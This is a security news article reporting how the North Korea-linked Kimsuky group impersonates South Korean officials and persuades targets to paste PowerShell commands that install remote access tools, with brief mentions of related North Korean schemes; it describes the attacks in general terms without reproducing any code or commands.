Kimsuky Phishing Scheme Impersonates South Korean Officials, Leverages Microsoft PowerShell 

• The notorious Kimsuky cyber espionage group with ties to North Korea poses as South Korean government representatives.
• The spear phishing campaign relies on emails with a malicious URL - embedded or included in an attachment.
• Attackers trick targets into running PowerShell as an administrator and back their activities with social engineering tactics.

North Korea-linked cyber espionage group Kimsuky (also known as Emerald Sleet, ARCHIPELAGO, Black Banshee, Thallium, Velvet Chollima, and APT43) has adopted a novel approach to compromising victims, employing social engineering and the exploit of trusted administrative tools like Microsoft PowerShell.  

The attackers pretend to be South Korean government officials, taking the time to build rapport with their targets before launching a spear-phishing campaign. This method, observed since January 2025, represents a significant evolution in the group's operational tradecraft, as detailed by Microsoft's Threat Intelligence team.

The phishing emails typically include a malicious PDF attachment or, in some cases, a link designed to appear legitimate but crafted to manipulate users into compromising their own systems.  

Victims are instructed via the phishing email to follow a URL that outlines steps to "register" their Windows system. These steps direct targets to launch PowerShell as an administrator and manually copy and execute a provided code snippet in the terminal. 

Once executed, this malicious code downloads and installs a browser-based remote desktop application and a certificate file with a hardcoded PIN from the attackers' remote server. The device is then registered using the downloaded certificate and PIN. 

This enables the threat actor to access the infected system remotely and initiate data exfiltration. 

Another North Korea-linked group previously deployed a similar method in the "Contagious Interview" campaign targeting macOS users in December 2024, tricking users into copying and running malicious commands via Apple’s Terminal app under the guise of addressing supposed camera and microphone access issues.   

Recent U.S. Department of Justice (DoJ) action uncovered a new North Korean scheme where an American woman helped North Korean IT workers secure remote jobs at over 300 U.S. companies and operated a "laptop farm" to simulate North Korean workers being in the U.S. Over 70 identities were stolen, and companies experienced data breaches and theft of proprietary information.